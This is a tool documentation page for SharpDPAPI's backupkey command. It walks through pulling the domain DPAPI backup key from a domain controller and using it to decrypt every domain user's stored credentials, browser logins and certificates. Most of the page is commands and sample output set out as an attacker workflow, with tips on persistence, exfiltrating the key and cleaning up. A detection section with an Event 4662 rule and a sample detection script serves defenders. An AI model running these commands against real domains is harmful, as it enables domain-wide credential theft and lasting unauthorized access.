
Overview

The backupkey command retrieves the domain DPAPI backup key from a domain controller using the LsaRetrievePrivateData API. This RSA private key decrypts the domain-escrowed copy of every domain user’s DPAPI masterkeys, and it never changes: it is generated once when the domain is created and is not rotated afterwards.
This command requires Domain Admin (or equivalent) privileges to retrieve the backup key from the domain controller.

Basic Usage

# Retrieve from current domain controller
SharpDPAPI.exe backupkey

# Specify domain controller
SharpDPAPI.exe backupkey /server:dc.domain.com

# Save to file
SharpDPAPI.exe backupkey /file:key.pvk

# Prevent base64 wrapping
SharpDPAPI.exe backupkey /nowrap

Command Arguments

Argument                    Description
/server:SERVER.domain.com   Specify domain controller (auto-detected if not provided)
/file:key.pvk               Save backup key to file instead of displaying
/nowrap                     Prevent wrapping base64 output (display in single line)

Why The Backup Key Is Powerful

Never Changes

The domain backup key is generated once and never rotates

Domain-Wide

Works for ALL domain users across the entire domain

Decrypt Anything

Can decrypt any domain user’s DPAPI-protected data (credentials, certificates, browser secrets) through that user’s masterkeys. Only domain user accounts escrow their masterkeys to the domain; machine (SYSTEM) masterkeys are protected by the local DPAPI_SYSTEM secret and are out of reach of this key.

Persistent Access

Maintains access even after password changes

Example: Retrieve Backup Key

SharpDPAPI.exe backupkey
Output:
[*] Action: Retrieve domain DPAPI backup key

[*] Using current domain controller  : PRIMARY.testlab.local
[*] Preferred backupkey Guid         : 32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Full preferred backupKeyName     : G$BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Key :
      HvG1sAAAAAABAAAAAAAAAAAAAACUBAAABwIAAACkAABSU0EyAAgAAA
      EAAQADYjk2xX6BGbvXhUKJwq0M9BqvzaKLLLfSU... (truncated)

Example: Save to File

SharpDPAPI.exe backupkey /server:primary.testlab.local /file:key.pvk
Output:
[*] Action: Retrieve domain DPAPI backup key

[*] Using server                     : primary.testlab.local
[*] Preferred backupkey Guid         : 32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Full preferred backupKeyName     : G$BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Backup key written to            : key.pvk
Save the backup key to a file for reuse. You won’t need to retrieve it again.

Using The Retrieved Backup Key

Once you have the backup key, pass it to other SharpDPAPI commands (and to SharpChrome) through the /pvk argument. It accepts either the inline base64 blob or the path to a saved .pvk file, and the same argument is used when triaging remote systems with /server:
# Use inline base64 key
SharpDPAPI.exe triage /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...
SharpDPAPI.exe masterkeys /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...
SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...

Typical Workflow

1. Obtain Domain Admin

Compromise an account with Domain Admin or equivalent privileges

2. Retrieve Backup Key

SharpDPAPI.exe backupkey /file:backup.pvk

3. Triage Local System

SharpDPAPI.exe triage /pvk:backup.pvk
SharpChrome.exe logins /pvk:backup.pvk

4. Triage Remote Systems

Requires local admin on each target: SharpDPAPI reads the masterkey and credential files over the target’s C$ share.

# File servers, workstations, etc.
SharpDPAPI.exe triage /pvk:backup.pvk /server:fileserver.domain.com
SharpDPAPI.exe triage /pvk:backup.pvk /server:workstation.domain.com

5. Maintain Access

Keep the backup key secure - it provides persistent domain-wide DPAPI decryption capability

Technical Details

Storage Location

The backup key is stored in Active Directory as a global LSA secret (the G$ prefix marks secrets kept in the directory rather than in the DC’s local registry), one per generation of the key:
G$BCKUPKEY_{GUID}
A companion secret, G$BCKUPKEY_PREFERRED, holds the GUID of the key currently in use; that is the "Preferred backupkey Guid" shown in the output above.

Retrieval Method

SharpDPAPI uses the LsaRetrievePrivateData API, the same method used by Mimikatz:
  • Opens the LSA policy on the target domain controller (LsaOpenPolicy with POLICY_GET_PRIVATE_INFORMATION), authenticating with the current security context
  • Reads the G$BCKUPKEY_PREFERRED secret, which holds the GUID of the current backup key
  • Reads the G$BCKUPKEY_{GUID} secret, extracts the RSA private key from the stored structure and wraps it in a PVK header

Key Properties

  • Algorithm: RSA, 2048-bit (the example output above declares a bit length of 0x800 in its RSA2 header)
  • Format: PVK container (magic 0xB0B5F11E, unencrypted) wrapping an RSA2 PRIVATEKEYBLOB; the base64 that SharpDPAPI prints is this PVK byte for byte, which is why it always begins with "HvG1s"
  • Persistence: Never rotates unless manually regenerated
  • Scope: All domain users
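As an added example (not SharpDPAPI’s or Mimikatz’s own code), the following Python parses that layout so a retrieved key can be sanity-checked before it is relied on: it validates the PVK header, confirms the inner blob is an unencrypted RSA2 PRIVATEKEYBLOB, checks that the declared blob length matches the key size, and can extract the RSA parameters and cross-check them. The 60-character base64 prefix is taken from the example output earlier on this page; the 16-bit toy key is constructed here purely to exercise the full parse, and the structure layouts are Microsoft’s documented PVK and PRIVATEKEYBLOB formats.

```python
# Added example: parse the PVK container and the RSA2 PRIVATEKEYBLOB inside it.
# Not SharpDPAPI code; layouts follow Microsoft's documented structures.
import base64
import struct
from math import gcd

PVK_MAGIC = 0xB0B5F11E
PVK_HEADER = struct.Struct("<IIIIII")   # magic, version, keyspec, encrypt_type, cb_encrypt_data, cb_pvk
BLOB_HEADER = struct.Struct("<BBHI")     # bType, bVersion, reserved, aiKeyAlg
RSAPUBKEY = struct.Struct("<4sII")        # magic ("RSA2"), bitlen, pubexp
PRIVATEKEYBLOB = 0x07
AT_KEYEXCHANGE = 1
CALG_RSA_KEYX = 0x0000A400

# First 60 base64 characters of the key shown in this page's example output.
PAGE_PREFIX_B64 = "HvG1sAAAAAABAAAAAAAAAAAAAACUBAAABwIAAACkAABSU0EyAAgAAA" + "EAAQAD"


def expected_blob_size(bitlen: int) -> int:
    """Size of an RSA2 PRIVATEKEYBLOB: headers + modulus + five half-size CRT values + d."""
    n = bitlen // 8
    return BLOB_HEADER.size + RSAPUBKEY.size + n + 5 * (n // 2) + n


def parse_pvk_header(data: bytes) -> dict:
    """Validate the PVK file header and the blob header that follows it."""
    magic, version, keyspec, enc_type, cb_enc, cb_pvk = PVK_HEADER.unpack_from(data, 0)
    if magic != PVK_MAGIC:
        raise ValueError("not a PVK file (bad magic 0x%08X)" % magic)
    if enc_type != 0:
        raise ValueError("password-encrypted PVK; the domain backup key is exported unencrypted")
    blob_off = PVK_HEADER.size + cb_enc            # cb_enc bytes of salt would sit here
    b_type, b_ver, _reserved, alg = BLOB_HEADER.unpack_from(data, blob_off)
    if b_type != PRIVATEKEYBLOB or b_ver != 2:
        raise ValueError("inner blob is not a version-2 PRIVATEKEYBLOB")
    rsa_magic, bitlen, pubexp = RSAPUBKEY.unpack_from(data, blob_off + BLOB_HEADER.size)
    if rsa_magic != b"RSA2":
        raise ValueError("inner blob is not an RSA private key (magic %r)" % rsa_magic)
    return {
        "version": version, "keyspec": keyspec, "alg": alg, "cb_pvk": cb_pvk,
        "bitlen": bitlen, "pubexp": pubexp, "blob_offset": blob_off,
        "blob_size_ok": cb_pvk == expected_blob_size(bitlen),
    }


def parse_pvk(data: bytes) -> dict:
    """Full parse: header fields plus the RSA parameters (all little-endian in the blob)."""
    hdr = parse_pvk_header(data)
    if not hdr["blob_size_ok"] or len(data) < hdr["blob_offset"] + hdr["cb_pvk"]:
        raise ValueError("blob length does not match the declared key size")
    n = hdr["bitlen"] // 8
    pos = hdr["blob_offset"] + BLOB_HEADER.size + RSAPUBKEY.size
    fields = [("modulus", n), ("prime1", n // 2), ("prime2", n // 2), ("exponent1", n // 2),
              ("exponent2", n // 2), ("coefficient", n // 2), ("private_exponent", n)]
    for name, size in fields:
        hdr[name] = int.from_bytes(data[pos:pos + size], "little")
        pos += size
    return hdr


def rsa_key_consistent(k: dict) -> bool:
    """Cross-check the CRT parameters against n, e and d."""
    p, q, e, d = k["prime1"], k["prime2"], k["pubexp"], k["private_exponent"]
    lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)
    return (k["modulus"] == p * q and (e * d) % lam == 1
            and k["exponent1"] == d % (p - 1) and k["exponent2"] == d % (q - 1)
            and (k["coefficient"] * q) % p == 1)


def parse_pvk_b64(text: str) -> dict:
    """Accept the base64 form SharpDPAPI prints (any line wrapping); header only."""
    return parse_pvk_header(base64.b64decode("".join(text.split())))


def build_toy_pvk() -> bytes:
    """Constructed sample: a deliberately tiny 16-bit RSA key in PVK layout, to exercise parse_pvk."""
    p, q, e = 61, 53, 17
    n, d = p * q, 2753                             # 17 * 2753 == 1 (mod lcm(60, 52))
    blob = BLOB_HEADER.pack(PRIVATEKEYBLOB, 2, 0, CALG_RSA_KEYX) + RSAPUBKEY.pack(b"RSA2", 16, e)
    blob += n.to_bytes(2, "little")
    for v in (p, q, d % (p - 1), d % (q - 1), pow(q, -1, p)):
        blob += v.to_bytes(1, "little")
    blob += d.to_bytes(2, "little")
    return PVK_HEADER.pack(PVK_MAGIC, 0, AT_KEYEXCHANGE, 0, 0, len(blob)) + blob
```

Running parse_pvk_b64 on the page’s prefix reports keyspec 1 (AT_KEYEXCHANGE), a 2048-bit key with public exponent 65537 and a declared blob size of 1172 bytes, which is exactly what a 2048-bit RSA2 blob occupies. A blob that fails these checks was truncated in transit or is not a backup key at all, so run them before exfiltrating or deleting the only copy.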

Converting Key Formats

No conversion is needed; the same PVK serves both tools:
  • For SharpDPAPI: pass the key inline as base64 or as a .pvk file through /pvk
  • For Mimikatz: the .pvk that lsadump::backupkeys /export writes is the same format, and dpapi::masterkey accepts it through its own /pvk argument
# Use directly as base64 or .pvk file
SharpDPAPI.exe triage /pvk:key.pvk

Detection Considerations

Retrieving the domain backup key is a high-value operation that should be detected and alerted.

Network Detection

  • MS-LSAD RPC: LsarRetrievePrivateData calls against a domain controller (carried over the \pipe\lsarpc SMB named pipe) for secret names beginning G$BCKUPKEY_. This is the only remote path that hands out the private key.
  • MS-BKRP (Backup Key Remote Protocol) is not the signal: it is what every domain client uses to escrow and recover masterkeys, and the DC performs the RSA operation itself without ever releasing the key, so that traffic is routine.
  • Event ID 4662 on the DC for the secret objects involved (see Event Log Indicators below)

Host-Based Detection

  • Process Execution: SharpDPAPI.exe or similar tools
  • API Calls: LsaOpenPolicy against a remote DC followed by LsaRetrievePrivateData
  • Access rights: the call needs POLICY_GET_PRIVATE_INFORMATION on the DC’s LSA policy object, which Domain Admins hold through the DC’s Administrators group; no separate privilege such as SeBackupPrivilege is exercised, so privilege-use auditing alone will not see it

Event Log Indicators

Monitor domain controllers for:
Event ID: 4662 (An operation was performed on an object)
Object Type: SecretObject
Access Mask: 0x2 (SECRET_QUERY_VALUE)
Object Name: contains BCKUPKEY (a complete retrieval reads BCKUPKEY_PREFERRED first, then BCKUPKEY_{GUID})
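As an added example (not from SharpDPAPI or any vendor rule set), the indicator above expressed as code and run over constructed event records. The records are a single-line key=value rendering of 4662 event data that is assumed here for readability; real exports differ in layout, but the field names (SubjectUserName, ObjectType, ObjectName, AccessMask) mirror the event’s own. The second function goes beyond a per-event match and flags the two-step read pattern a full backupkey run produces, which separates a complete retrieval from a lone touch of one secret.

```python
# Added example: the page's Event ID 4662 indicator as a detection over constructed events.
# Not vendor or SharpDPAPI code; the key=value line format is an assumption for the sample.
import re
from collections import defaultdict

SECRET_QUERY_VALUE = 0x2

# Constructed sample records (chronological). Lines 1-2 are what one backupkey
# retrieval looks like: the PREFERRED secret is read to learn the GUID, then the
# keyed secret itself. The GUID is the one from this page's example output.
SAMPLE_EVENTS = """
EventID=4662 SubjectUserName=jdoe ObjectType=SecretObject ObjectName=BCKUPKEY_PREFERRED AccessMask=0x2
EventID=4662 SubjectUserName=jdoe ObjectType=SecretObject ObjectName=BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8 AccessMask=0x2
EventID=4662 SubjectUserName=svc_backup ObjectType=SecretObject ObjectName=$MACHINE.ACC AccessMask=0x2
EventID=4624 SubjectUserName=jdoe ObjectType=- ObjectName=- AccessMask=0x0
EventID=4662 SubjectUserName=jsmith ObjectType=SecretObject ObjectName=BCKUPKEY_PREFERRED AccessMask=0x1
EventID=4662 SubjectUserName=helpdesk1 ObjectType=SecretObject ObjectName=BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8 AccessMask=0x2
""".strip().splitlines()

_FIELD = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict with numeric EventID and AccessMask."""
    ev = dict(_FIELD.findall(line))
    ev["EventID"] = int(ev["EventID"])
    ev["AccessMask"] = int(ev["AccessMask"], 16)
    return ev


def is_backup_key_read(ev: dict) -> bool:
    """The indicator from this page: a SecretObject query whose name contains BCKUPKEY."""
    return (ev["EventID"] == 4662
            and ev["ObjectType"] == "SecretObject"
            and ev["AccessMask"] & SECRET_QUERY_VALUE != 0
            and "BCKUPKEY" in ev["ObjectName"].upper())


def backup_key_reads(lines) -> list:
    """Every event that matches the indicator, in input order."""
    return [ev for ev in map(parse_event, lines) if is_backup_key_read(ev)]


def full_retrievals(lines) -> dict:
    """Subjects that read BCKUPKEY_PREFERRED and then a BCKUPKEY_{GUID} secret.

    That is the complete backupkey sequence; a keyed-secret read with no preceding
    PREFERRED lookup by the same subject is reported by backup_key_reads() but not here.
    """
    by_subject = defaultdict(list)
    for ev in backup_key_reads(lines):
        by_subject[ev["SubjectUserName"]].append(ev["ObjectName"])
    found = {}
    for subject, names in by_subject.items():
        saw_preferred = False
        for name in names:
            if name.upper() == "BCKUPKEY_PREFERRED":
                saw_preferred = True
            elif saw_preferred:                  # keyed secret read after the GUID lookup
                found.setdefault(subject, []).append(name)
    return found
```

On the sample, backup_key_reads returns three events (two for jdoe, one for helpdesk1): the $MACHINE.ACC read is a different secret, the 4624 is not an object-access event, and jsmith’s access mask lacks the query bit. full_retrievals narrows that to jdoe alone, whose PREFERRED lookup followed by the keyed-secret read is the signature of a completed retrieval; helpdesk1’s lone keyed read still deserves a look, but it is a weaker signal.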

Defensive Measures

  • Monitor for Event ID 4662 with object type SecretObject and object name containing “BCKUPKEY”
  • Alert on LsarRetrievePrivateData (MS-LSAD) requests to domain controllers for G$BCKUPKEY_* secrets; legitimate MS-BKRP backup and restore traffic is routine and is not the signal
  • Track LsaRetrievePrivateData API calls on monitored hosts
  • Monitor for privileged account access to sensitive LSA secrets
  • Strictly control Domain Admin privileges
  • Implement tiered administration model
  • Use Protected Users group for high-value accounts (limits credential theft; it does not restrict what a Domain Admin can read)
  • Enable the audit policy that produces 4662 for object access on domain controllers; without it the indicator above is never logged
  • Treat the key as unrotatable in practice: there is no documented procedure for rotating it, and masterkeys already escrowed stay decryptable with the old key, so a confirmed exposure means every domain user’s DPAPI-protected secrets should be considered compromised

Tips

  • Retrieve the backup key once and reuse it
  • Store securely - it’s valid indefinitely
  • Use /file to avoid base64 in command history
  • Consider exfiltrating key over encrypted channel
  • Clean up temporary files after use

Troubleshooting

Access Denied:
  • Verify you have Domain Admin (or equivalent) privileges; the call needs POLICY_GET_PRIVATE_INFORMATION on the DC’s LSA policy object
  • Check network connectivity to the domain controller: SMB (TCP 445) and the \pipe\lsarpc named pipe must be reachable
No backup key found:
  • Every domain has one; it is created automatically by the first domain controller, so this usually means the G$BCKUPKEY_PREFERRED secret could not be read rather than that no key exists
  • Verify the domain controller is functioning properly
  • Try specifying DC explicitly with /server

Mimikatz Equivalent

# Mimikatz command
mimikatz# lsadump::backupkeys /system:dc.domain.com /export

# SharpDPAPI equivalent
SharpDPAPI.exe backupkey /server:dc.domain.com /file:key.pvk
Both retrieve the same backup key; Mimikatz’s /export writes it to a .pvk file that SharpDPAPI’s /pvk argument consumes directly, so no conversion is needed in either direction.